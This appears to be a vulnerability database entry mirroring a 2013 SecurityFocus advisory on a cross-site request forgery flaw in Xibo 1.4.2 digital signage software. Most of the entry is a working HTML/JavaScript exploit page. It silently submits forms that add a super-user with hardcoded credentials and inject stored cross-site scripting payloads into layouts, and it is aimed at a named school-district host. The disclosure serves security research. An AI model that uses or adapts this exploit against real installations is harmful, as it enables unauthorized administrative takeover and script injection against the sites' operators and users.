Xibo - Cross-Site Request Forgery

🗓️ 21 Aug 2013 00:00:00Reported by Jacob HolcombType

Xibo 1.4.2 Cross-Site Request Forgery vulnerability, allowing unauthorized actions and acces

Reporter	Title	Published	Views	Family All 17
ATTACKERKB	CVE-2013-4888	29 Jan 201418:55	–	attackerkb
ATTACKERKB	CVE-2013-4889	29 Jan 201418:55	–	attackerkb
Circl	CVE-2013-4888	21 Aug 201300:00	–	circl
Circl	CVE-2013-4889	21 Aug 201300:00	–	circl
CVE	CVE-2013-4888	29 Jan 201418:00	–	cve
CVE	CVE-2013-4889	29 Jan 201418:00	–	cve
Cvelist	CVE-2013-4888	29 Jan 201418:00	–	cvelist
Cvelist	CVE-2013-4889	29 Jan 201418:00	–	cvelist
EUVD	EUVD-2013-4733	7 Oct 202500:30	–	euvd
EUVD	EUVD-2013-4734	7 Oct 202500:30	–	euvd

source: https://www.securityfocus.com/bid/62064/info

Xibo is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

Xibo 1.4.2 is vulnerable; other versions may also be affected. 

<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
    document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="[email protected]">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+
    '</form>');
}

//Set XSS Payloads
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror='alert(42)'>">'+
    '<input type="hidden" name="description" value="<iframe src='http://securityevaluators.com' width=100 height=1000</iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+
    '</form>');
}

function createPage(){
    RF1();
    RF2();
}

function _addAdmin(){
    document.addAdmin.submit();
}

function _addXSS(){
    document.addXSS.submit();
}

//Called Functions
createPage()
   
for (var i = 0; i < 2; i++){
    if(i == 0){
        window.setTimeout(_addAdmin, 0500);
    }
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);
    }
    else{
        continue;
    }
}
</script>
</body>
</html>

21 Aug 2013 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 26.8

EPSS0.00757